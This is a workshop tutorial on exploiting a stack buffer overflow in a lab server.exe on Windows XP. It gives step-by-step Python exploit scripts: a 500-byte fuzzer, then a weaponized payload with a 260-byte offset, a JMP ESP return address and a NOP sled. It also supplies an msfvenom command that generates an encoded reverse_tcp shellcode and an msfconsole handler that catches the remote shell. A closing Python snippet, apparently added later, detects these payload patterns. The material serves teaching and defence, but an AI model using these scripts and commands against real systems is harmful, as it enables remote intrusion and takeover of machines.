This workshop covers exploit development, including setting up virtual machines, creating attack code, and weaponizing vulnerabilities. Step-by-step instructions and code samples are provided.
Workshop – Exploit Development
For the preparation of the workshop, two virtual machines are set up in VMware: Kali Linux and Windows XP. The network adapter of both machines is set to NAT, which lets the private IP addresses reach the internet and communicate with each other. The IP addresses are checked so that the two machines can reach one another. On the Windows machine, Immunity Debugger is opened, server.exe is loaded into it and execution is started. In the next step, a file named attack.py is created on the Kali Linux machine with the vi editor, and the code given in the workshop is inserted into it:

    #!/usr/bin/python
    # Python 2: a str literal is a byte string, so "\x41" is one 0x41 byte ('A')
    import sys
    import socket

    host = sys.argv[1]
    port = int(sys.argv[2])

    # Testing: 500 bytes of 'A' to see whether the saved return address gets overwritten
    buffer = "\x41" * 500

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(buffer)
    s.close()

The command "python attack.py 192.168.0.57 1337" is executed to proceed with the attack; the IP address used is that of the Windows host. On the Windows machine, Shift + F9 is pressed to pass the exception to the program and continue execution. A sample result is shown in the following screenshot: the EIP value changes to the value supplied by the attacker, and the same holds for the EBP value. ESP points to a region of memory that contains the value injected by the attacker.

To weaponize the vulnerability, Immunity Debugger is used again: server.exe is restarted and execution is started. In the command line of the Kali Linux machine, the command "cd /usr/share/metasploit-framework/tools/exploit" is used to enter the Metasploit Framework tools directory. The command "./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337" is executed from Kali Linux to send a 5000-byte cyclic pattern to the Windows host. On the Windows side, Shift + F9 is pressed to pass the exception, and the result is viewed to identify the EIP value. To determine the offset at which EIP is overwritten, the command "./pattern_offset.rb -l 5000 -q 37694136" is used and the returned result is noted; for the given case it is 260. Based on this, the address of an instruction that jumps to ESP is determined, because ESP is the stack pointer that points to the memory region from which control is to continue. server.exe is restarted by pressing Ctrl + F2, and F9 is pressed after Immunity Debugger has started it. Alt + E is pressed in the Windows virtual machine to view the executable modules. A search is made for JMP ESP, and if the result is in GDI32 the memory address is noted. The attack code on the Kali Linux machine is modified according to the workshop as follows:

    #!/usr/bin/python
    import sys
    import socket

    host = sys.argv[1]
    port = int(sys.argv[2])

    # EIP is overwritten at 260 bytes
    buffer = "\x41" * 260
    # Overwrite EIP with the address of JMP ESP (0x77F31678, written little-endian)
    buffer += "\x78\x16\xF3\x77"
    # NOP sled
    buffer += "\x90" * 128
    # Shellcode: the msfvenom output goes here (omitted in the original)
    buffer += ""

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(buffer)
    s.close()

The command "msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python" is used to generate the shellcode, and the exploitation is performed. For the exploitation, the handler is started with msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.2; exploit", and Immunity Debugger is closed on the Windows client.
The modified Python code is executed with the IP address of the client to complete the workshop.
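From the defender's side, the two scripts above send traffic with a very recognisable shape: a long run of one filler byte, a little-endian return address right after it, and a NOP sled. The following Python 3 snippet is an added example (not part of the workshop or its code) that inspects a captured TCP payload for exactly those indicators; the thresholds, the Windows system-DLL address range and the sample payloads are assumptions constructed for the example.

```python
from dataclasses import dataclass
import struct

@dataclass
class Finding:
    offset: int   # where in the payload the indicator starts
    kind: str     # "filler_run", "ret_addr" or "nop_sled"
    detail: str

def _runs(data: bytes, min_len: int):
    """Yield (offset, byte, length) for each run of one repeated byte >= min_len."""
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i >= min_len:
            yield i, data[i], j - i
        i = j

def inspect_payload(data: bytes, filler_min: int = 64, sled_min: int = 16) -> list:
    """Thresholds are assumptions chosen for this example, not a tuned signature."""
    findings = []
    for off, b, n in _runs(data, min(filler_min, sled_min)):
        if b == 0x90 and n >= sled_min:
            findings.append(Finding(off, "nop_sled", "%d x 0x90" % n))
        elif n >= filler_min:
            findings.append(Finding(off, "filler_run", "%d x 0x%02x" % (n, b)))
            # The 4 bytes right after the filler: a little-endian address inside the
            # 32-bit Windows system-DLL range is the classic overwritten return address.
            tail = data[off + n:off + n + 4]
            if len(tail) == 4:
                addr = struct.unpack("<I", tail)[0]
                if 0x70000000 <= addr <= 0x7FFFFFFF:
                    findings.append(Finding(off + n, "ret_addr", "0x%08x" % addr))
    return findings

def classify(data: bytes) -> str:
    kinds = {f.kind for f in inspect_payload(data)}
    if "filler_run" in kinds and ("ret_addr" in kinds or "nop_sled" in kinds):
        return "weaponized_overflow"
    return "overflow_probe" if "filler_run" in kinds else "benign"

# Constructed sample payloads (not captured traffic): a normal request, the 500-byte
# probe of the first script, and the second script's layout with the shellcode omitted.
BENIGN = b"GET / HTTP/1.0\r\nHost: example.test\r\n\r\n"
PROBE = b"\x41" * 500
WEAPONIZED = b"\x41" * 260 + b"\x78\x16\xF3\x77" + b"\x90" * 128 + b"<shellcode omitted>"
```

On the weaponized sample the findings land at offsets 0, 260 and 264, which is the layout the second script builds; a benign request produces no findings at all.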